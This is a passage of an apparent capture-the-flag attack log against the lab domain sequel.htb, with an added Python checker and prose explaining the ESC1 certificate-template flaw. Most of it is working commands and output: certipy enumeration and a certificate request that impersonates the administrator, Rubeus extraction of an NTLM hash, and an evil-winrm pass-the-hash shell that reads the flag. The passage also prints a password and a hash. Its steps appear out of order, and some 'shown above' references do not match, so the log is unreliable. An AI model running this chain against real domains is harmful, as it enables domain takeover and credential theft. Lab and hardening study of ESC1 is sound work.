igludTTW/V4uTtzBNZsXR3fcMuE2XzPPF+FvpKtwJctAkcufyZd5w2q8pBW+hFaNRjUM8vEsbKIuYuTV
XtTz0/yiSb2VWT7mw7xA7u0BFbHfZj2YsWeMRPH9tRQfrx6OOtAXaWbtQvIoUcOjglI2droZCxr0OfDv
dxz/shtv3s039/0hCfbpRJl/at51Q6HoAiS98Ru0+XEfkDmLWNjtIxDYHL367x/lMQXDqG7jk2n3iB5i
EGzI8criSX2X7Yb/RwW5qNWDqhC00JitX8xjfU0xalDiI641fl/VJJeNTK//9hibYuw6+79bKhm2ZxLR
1lQoiqkX6kH96ldA9frtFRyxMPoG+Ev7fQr1GWYLGW+tkC6d7gfzHEnUUeDtdFGtyTlDqRdKcVBsPx6m
vuOa6Np/GgPtig2bJlz22aFNK6+7JiBri9d64nuphTEQXBvnXuRPHOE4kJL8IZD5zGCLHTXHlSk9IU18
AUPltuAZYhBtJI9ffLLETewnfeZDafjrvf8l6uR4mqrEtkZ3xdbCj5/1W5CGwDQGM/im1dqKH6UglyKd
6qXdVweemQpA5siIn3kbxfiszoJxvhDl+UlLTzw0uBFlXzpdc5lGnFoiff6OgjHTcDmmRmBXuktvxRf1
OLBaIrVlue3JTZSKB8TXQphTk/cu2FqZMiEpxlTqnyeSYYmt6KrcmXsZ5/OllDI/89ubC1e+AagojRRd
R8Ajul/an23kQmGF2bCZDTtw1yeuum70+c9hjINhtp5tgwe8Z0kI9Wd5a8hXZDBSJs2SljuGOs+v4nSN
G+Npw6lGLdMmqtuW7XGrmxJJL6N5N1JLtgqPfEeIiZ+1B33UxCLrpEv6MF0oJahSsKjvsAae+0ZCJ9ls
z401L8bJ6EsdZ6RgfDt1zaOB1TCB0qADAgEAooHKBIHHfYHEMIHBoIG+MIG7MIG4oBswGaADAgEXoRIE
EASgSxSJPhNSvIM1UbB0x+yhDBsKU0VRVUVMLkhUQqIaMBigAwIBAaERMA8bDWFkbWluaXN0cmF0b3Kj
BwMFAADhAAClERgPMjAyNDEwMTIxNjI5NDBaphEYDzIwMjQxMDEzMDIyOTQwWqcRGA8yMDI0MTAxOTE2
Mjk0MFqoDBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : administrator
UserRealm : SEQUEL.HTB
StartTime : 10/12/2024 9:29:40 AM
EndTime : 10/12/2024 7:29:40 PM
RenewTill : 10/19/2024 9:29:40 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : BKBLFIk+E1K8gzVRsHTH7A==
ASREP (key) : 85742085636725858D930F1414606557
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\documents\cert.pfx /getcredentials /show /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::4962:1632:659d:e390%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : administrator
UserRealm : SEQUEL.HTB
StartTime : 10/12/2024 9:31:26 AM
EndTime : 10/12/2024 7:31:26 PM
RenewTill : 10/19/2024 9:31:26 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : DIAHQIuZHSEZlbQBDkLc+A==
ASREP (key) : 110909A97E0152C6912DECA81DCFBE8F
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
└─$ certipy find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101
Certificate Validity Start : 2022-11-18 20:58:46+00:00
Certificate Validity End : 2121-11-18 21:08:46+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
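Both Certify (`find /vulnerable`) and certipy (`find -vulnerable`) arrive at the same verdict on `UserAuthentication` from the same template attributes: `ENROLLEE_SUPPLIES_SUBJECT` set in `msPKI-Certificate-Name-Flag`, no `PEND_ALL_REQUESTS` (manager approval) in `msPKI-Enrollment-Flag`, zero authorized signatures, a logon-capable EKU (Client Authentication), and Enroll granted to Domain Users. The following is an added example, not code from either tool, that applies that ESC1 rule to the template exactly as it is reported above and to two hardened variants an administrator might deploy. The flag bits and EKU OIDs are the real AD values; the `Template` dataclass and the helper names are this example's own.

```python
from dataclasses import dataclass, replace
from typing import List

# Bits of msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag as stored in AD.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001     # name flag: requester chooses subject / SAN
CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS = 0x00000001  # enrollment flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002             # enrollment flag: "Requires Manager Approval"
CT_FLAG_PUBLISH_TO_DS = 0x00000008                 # enrollment flag

# EKUs that make a certificate usable for AD logon (PKINIT / Schannel).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Principals every domain account belongs to; Enroll for any of them is low-privileged enrollment.
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}   # Everyone, Authenticated Users
LOW_PRIV_RIDS = {"513", "515"}            # Domain Users, Domain Computers (domain-relative RIDs)
DOMAIN_SID = "S-1-5-21-4078382237-1492182817-2568127209"   # sequel.htb, from the Certify output above


@dataclass(frozen=True)
class Template:
    name: str
    name_flag: int            # msPKI-Certificate-Name-Flag
    enrollment_flag: int      # msPKI-Enrollment-Flag
    ra_signatures: int        # msPKI-RA-Signature ("Authorized Signatures Required")
    ekus: tuple               # pKIExtendedKeyUsage OIDs
    enroll_sids: tuple        # SIDs holding the Enroll right in the template's DACL
    published: bool = True    # listed in an enterprise CA's certificateTemplates attribute


def variant(t: Template, **changes) -> Template:
    return replace(t, **changes)


def is_low_priv(sid: str) -> bool:
    return sid in LOW_PRIV_SIDS or (sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS)


def allows_auth(ekus) -> bool:
    # No EKU at all means the certificate is valid for any purpose, logon included.
    return not ekus or bool(AUTH_EKUS & set(ekus))


def esc1_findings(t: Template) -> List[str]:
    """Conditions NOT met. An empty list means the template is ESC1-exploitable."""
    missing = []
    if not t.published:
        missing.append("template is not published on an enterprise CA")
    if not t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        missing.append("requester cannot supply the subject / SAN")
    if t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        missing.append("manager approval is required")
    if t.ra_signatures > 0:
        missing.append("authorized signatures are required")
    if not allows_auth(t.ekus):
        missing.append("no authentication EKU")
    if not any(is_low_priv(s) for s in t.enroll_sids):
        missing.append("no low-privileged principal has Enroll")
    return missing


def is_esc1(t: Template) -> bool:
    return not esc1_findings(t)


# UserAuthentication as Certify/certipy report it above, transcribed into numeric form.
USER_AUTHENTICATION = Template(
    name="UserAuthentication",
    name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    enrollment_flag=CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS | CT_FLAG_PUBLISH_TO_DS,
    ra_signatures=0,
    ekus=("1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4", "1.3.6.1.5.5.7.3.4"),  # Client Auth, EFS, Secure Email
    enroll_sids=(DOMAIN_SID + "-512", DOMAIN_SID + "-513", DOMAIN_SID + "-519"),   # Domain Admins, Domain Users, Enterprise Admins
)

# Two fixes an administrator could apply, each sufficient on its own (constructed variants).
HARDENED_CA_BUILDS_SUBJECT = variant(USER_AUTHENTICATION, name_flag=0)
HARDENED_MANAGER_APPROVAL = variant(
    USER_AUTHENTICATION, enrollment_flag=USER_AUTHENTICATION.enrollment_flag | CT_FLAG_PEND_ALL_REQUESTS)

if __name__ == "__main__":
    for t in (USER_AUTHENTICATION, HARDENED_CA_BUILDS_SUBJECT, HARDENED_MANAGER_APPROVAL):
        print(t.name, "ESC1" if is_esc1(t) else "not ESC1", esc1_findings(t))
```

The template check is only half of it: the requester also needs Enroll on the CA object itself, which both tools confirm above (`Authenticated Users` hold Enroll on `sequel-DC-CA`). The `Certificate has no object SID` line in the certipy request output is the other thing to watch: after KB5014754, a domain controller in Full Enforcement mode refuses to map a certificate that lacks the SID security extension to the account named in its SAN, so the PKINIT `asktgt` shown above only succeeds because this DC is still in compatibility mode.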
└─$ certipy req -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 15
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
└─$ evil-winrm -i 10.129.228.253 -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
0bb099b417e05141ed88932a9a14c558
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : dc
Primary Dns Suffix . . . . . . . : sequel.htb
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : sequel.htb
.htb
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-7A-DD
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:beef::4962:1632:659d:e390(Preferred)
Link-local IPv6 Address . . . . . : fe80::4962:1632:659d:e390%4(Preferred)
IPv4 Address. . . . . . . . . . . : 10.129.228.253(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Lease Obtained. . . . . . . . . . : Saturday, October 12, 2024 8:01:29 AM
Lease Expires . . . . . . . . . . : Saturday, October 12, 2024 10:31:29 AM
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%4
10.129.0.1
DHCP Server . . . . . . . . . . . : 10.129.0.1
DHCPv6 IAID . . . . . . . . . . . : 251678806
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-88-DA-51-00-0C-29-37-43-59
DNS Servers . . . . . . . . . . . : 127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled